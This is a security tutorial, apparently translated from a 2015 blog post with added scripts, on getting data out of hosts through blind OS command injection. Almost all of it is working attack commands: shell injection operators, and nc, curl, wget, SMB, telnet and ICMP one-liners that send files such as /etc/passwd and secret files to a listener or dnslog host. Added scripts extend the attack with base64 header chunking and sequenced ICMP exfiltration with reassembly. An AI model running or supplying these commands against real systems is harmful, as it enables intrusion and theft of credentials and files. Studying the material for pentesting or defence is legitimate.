Data Exfiltration via Blind OS Command Injection

Published: November 18, 2015

We often run into the situation where we can execute a command but cannot get its output echoed back to us. Platforms such as CloudEye later appeared to help with this, but they only show that a request arrived in their log; some content still cannot be seen. When the content is large, for example, the Apache access log records only "POST xxxx" and nothing of the request body.

Usually when we execute commands we want to run several of them at once, for efficiency. This situation is especially common with command execution vulnerabilities: a known command is run with a parameter we control, so only that one command gets executed. To run other commands in that environment we need the shell's command operators, which let us run arbitrary commands on the host operating system. The table below details the operators that can be used in this kind of attack:
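As an added illustration (this is not code from the original post), here is a minimal "lookup" wrapper built two ways, so the effect of each operator can be seen. The vulnerable version interpolates user input into a command string that a shell re-parses; the safe version passes the value as a single argument and never re-parses it. The base command `echo resolving` is a stand-in for whatever real command (ping, nslookup, ...) an application would run, and `INJECTED` stands in for a real payload such as `id`.

```bash
#!/bin/sh
# Added example: the same wrapper with and without a shell re-parse.
# 'echo resolving' is an illustrative stand-in for a real command.

# Vulnerable: user input becomes part of a string that sh parses again,
# so every operator in the input is honoured.
lookup_vulnerable() {
  sh -c "echo resolving $1"
}

# Safe: the input is one argument; operators in it are just characters.
lookup_safe() {
  printf 'resolving %s\n' "$1"
}

# Run the usual injection operators against the vulnerable wrapper.
# Note that '||' only fires if the preceding command fails, which is why
# attackers pair it with input that makes the base command error out.
# A literal newline in the input works like ';' as well.
demo_operators() {
  for payload in \
    'x; echo INJECTED' \
    'x && echo INJECTED' \
    'x || echo INJECTED' \
    'x | echo INJECTED' \
    '$(echo INJECTED)' \
    '`echo INJECTED`'
  do
    printf '%-22s -> ' "$payload"
    lookup_vulnerable "$payload" | tr '\n' ' '
    echo
  done
  printf '%-22s -> ' 'safe: x; echo INJECTED'
  lookup_safe 'x; echo INJECTED'
}

demo_operators
```

Every payload except `||` produces `INJECTED` from the vulnerable wrapper (the `|` case swallows the original output entirely, because `echo INJECTED` ignores its stdin), while the safe wrapper prints the payload back as plain text.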

How do we get sensitive information, or the results of our commands, back from the host in this situation? The following details a number of ways of sending the data out to a host or web server that we control.

 

NetCat

Use nc to tunnel the file we want out. On the target:

nc -l -p {port} < {file/to/extract}

Then connect to that port on the target from our own machine and the contents of the file are printed out. This needs an inbound connection to the target to be allowed; if only outbound connections get through, reverse it: listen on our host with nc -l -p {port} > out.txt and run nc {our ip} {port} < {file/to/extract} on the target.

If the vulnerable machine is Windows, the contents can be served up with (nc -L is the Windows nc "listen harder" flag, which keeps listening after a client disconnects):

type {file to extract}  | nc -L -p {port}

 

CURL

curl is an extremely handy tool on Linux. Besides HTTP requests, it can also speak FTP/SCP/TFTP/TELNET and more. With CloudEye, the request we send looks like this:

curl http://abc.333d61.dnslog.info//tangscan/iswin.jpg/?cmd=$(whoami)

If the file contents are too large to fit in a GET request, use POST instead:

cat /path/to/file | curl -F ":data=@-" http://xxx.xxx.xxx.xxxx:xxxx/test.txt

The content then has to be read on the receiving side. As noted above, a default Apache access log records only the request line, not the body, so capture the request with a raw listener (e.g. nc -l -p {port}) or a server-side script that logs the body.

curl can also transfer the data over FTP. Given command execution, curl -T (upload) is all that is needed:

curl -T {path to file} ftp://xxx.xxx.xxx.xxx --user {username}:{password}

As mentioned earlier, besides these, curl can use the TFTP/TELNET/SCP protocols in the same way.

WGET

wget is the download tool we all know. To send a request to our server with a custom header, the option has the form:

--header='name:value'

This builds a request containing a header of our choosing, and the value can be the contents of a file:

wget --header="EVIL:$(cat /data/secret/password.txt)" http://xxx.xxx.xxx:xxx

A header value cannot contain a newline, so a file that spans more than one line has to be flattened onto a single line first. Note that this loses the line structure, and that xargs interprets quotes in its input:

wget --header="evil:`cat /etc/passwd | xargs echo -n`" http://xxx.xxx.xxx:xxxx
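The flattening above throws away newlines and trips over quotes, and a large file will not fit in one header anyway. As an added example (not code from the original post), the following encodes the file with base64 so that newlines, quotes, spaces and binary bytes all survive, splits it into header-sized pieces with an index, and rebuilds it on the receiving side. The same encoding applies equally to the curl POST case above. The header name `X-Exfil`, the chunk width of 4000 and the URL in the usage comment are assumptions.

```bash
#!/bin/sh
# Added example: base64 + chunking for header-based exfiltration.

# Whole file as one base64 token (no newlines, quotes or binary bytes).
header_encode() {
  base64 "$1" | tr -d '\n'      # strip base64's own line wrapping
}

# "index:chunk" lines of at most $2 base64 characters each. Apache's
# default LimitRequestFieldSize is 8190 bytes, so a width of 4000 leaves
# plenty of room for the header name and the index.
header_chunks() {
  n=0
  { header_encode "$1"; echo; } | fold -w "$2" | while IFS= read -r c; do
    [ -n "$c" ] || continue
    printf '%d:%s\n' "$n" "$c"
    n=$((n + 1))
  done
}

# Sender (not run in this example): one request per chunk; the receiving
# web server only has to log the X-Exfil header (assumed name).
# Usage: header_send /data/secret/password.txt http://xxx.xxx.xxx.xxx:xxxx/
header_send() {
  header_chunks "$1" 4000 | while IFS= read -r line; do
    wget -q -O /dev/null --header="X-Exfil: $line" "$2"
  done
}

# Receiver: feed the logged header values (one "index:chunk" per line, in
# any order) on stdin to rebuild the original file on stdout.
# Uses GNU coreutils base64 -d (older macOS spells it base64 -D).
header_reassemble() {
  sort -t: -k1,1n | cut -d: -f2 | tr -d '\n' | base64 -d
}
```

Because each chunk carries its index, the requests may arrive out of order or be retried without corrupting the result, and the receiver needs nothing beyond the header values it logged.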

It is also possible to use wget to submit a POST request to our web server and send string data in the request body using the '--post-data' flag, or the contents of a file using the '--post-file' flag. These flags expect content of the form 'key1=value1&key2=value2'.

To retrieve the contents of a file using '--post-data' we can run a command such as the one below, which extracts a file containing a secret code (the argument is quoted so that whitespace in the file does not get split into extra arguments):

wget --post-data "exfil=`cat /data/secret/secretcode.txt`" http://xxx.xxx.xxx.xxx:xxxx

The next command shows how we can use '--post-file' to retrieve a web page that forms part of the application. On a pentest we might do this to view the code to identify further vulnerabilities; on a CTF you might do this to reveal a trophy hidden within the PHP code:

wget --post-file trophy.php http://xxx.xxx.xxx.xxx:xxxx

SMB

If the vulnerable web application is running on Windows, it may be possible to extract a file by creating a network share on your host and then getting the victim server to connect to your share and copy the file over (outbound SMB, TCP 445, has to be allowed from the victim). This can be done with the net use command:

net use h: \\xxx.xxx.xxx.xxx\web /user:{username} {password} && copy {File to Copy} h:\(unknown).txt

TELNET

If a telnet client is present on the remote server, you can use it to transfer a file to a listener on your host (e.g. nc -l -p {port} > out.txt) with the following command:

telnet xxx.xxx.xxx.xxx {port} < {file to transfer}

ICMP

If the host you are targeting has been hardened and tools such as netcat, wget and curl have been removed, there are still some techniques you can use. Try to get the host to ping your box and see if ICMP is let out through any intervening firewalls. If it is, and the underlying host is running Linux, we can exfiltrate data in ICMP echo requests using the -p flag. The -p flag lets you specify up to 16 "pad" bytes, given as hex digits, that are used to fill the packet payload. This is where we will store the data we want to exfiltrate.

First we need to convert the file into hex, then pass each 16-byte chunk as the pad pattern of its own echo request. This can be done with the following one-liner:

cat password.txt | xxd -p -c 16 | while read exfil; do ping -p "$exfil" -c 1 xxx.xxx.xxx.xxx; done

In Wireshark we can observe the packets containing our data. You could write a script which scrapes the packets and re-assembles the file on the host. Note that nothing in the packets records which chunk came first, so a lost or reordered echo request corrupts the reassembled file.
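As an added example (not code from the original post), the following variant of the loop reserves the first 2 bytes of each 16-byte pattern for a sequence number and carries 14 bytes of file data, so captured patterns can be sorted and de-duplicated on the receiving side; it also includes the reassembly script the post leaves as an exercise, using only od, fold and printf (no xxd needed). The destination address and the capture command in the usage note are assumptions.

```bash
#!/bin/sh
# Added example: sequenced ping -p patterns and receiver-side reassembly.
# Pattern layout (32 hex digits = the 16-byte maximum ping accepts):
#   4 hex digits sequence number + 28 hex digits (14 bytes) of file data
# 65536 sequence numbers allow files up to about 917 KB.

# Emit one pattern per line for the given file.
icmp_chunks() {
  seq=0
  { od -An -v -tx1 "$1" | tr -d ' \n'; echo; } | fold -w 28 |
  while IFS= read -r chunk; do
    [ -n "$chunk" ] || continue
    printf '%04x%s\n' "$seq" "$chunk"
    seq=$((seq + 1))
  done
}

# Sender (not run in this example): one echo request per pattern.
# Usage: icmp_send password.txt xxx.xxx.xxx.xxx
icmp_send() {
  icmp_chunks "$1" | while IFS= read -r pat; do
    ping -c 1 -p "$pat" "$2" >/dev/null
  done
}

# Hex string on stdin -> raw bytes on stdout via POSIX octal printf escapes.
hex_to_bin() {
  { tr -d '\n'; echo; } | fold -w 2 | while IFS= read -r b; do
    [ -n "$b" ] || continue
    printf "\\$(printf '%03o' "0x$b")"
  done
}

# Receiver: captured patterns on stdin (one 32-hex-digit string per line,
# any order, duplicates allowed) -> original file bytes on stdout.
icmp_reassemble() {
  LC_ALL=C sort -u | while IFS= read -r pat; do
    printf '%s' "${pat#????}"   # drop the 2-byte sequence prefix
  done | hex_to_bin
}
```

To obtain the patterns on the receiving host, extract the ICMP payload of each echo request as hex (for instance with tshark's `-T fields -e data`, stripping any colons the output contains). Linux's iputils ping overwrites the start of the payload with a send timestamp, so take the pattern from its second repetition in the payload (bytes 16 to 31, i.e. hex digits 33 to 64) rather than the first, and feed those 32-digit strings to icmp_reassemble.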
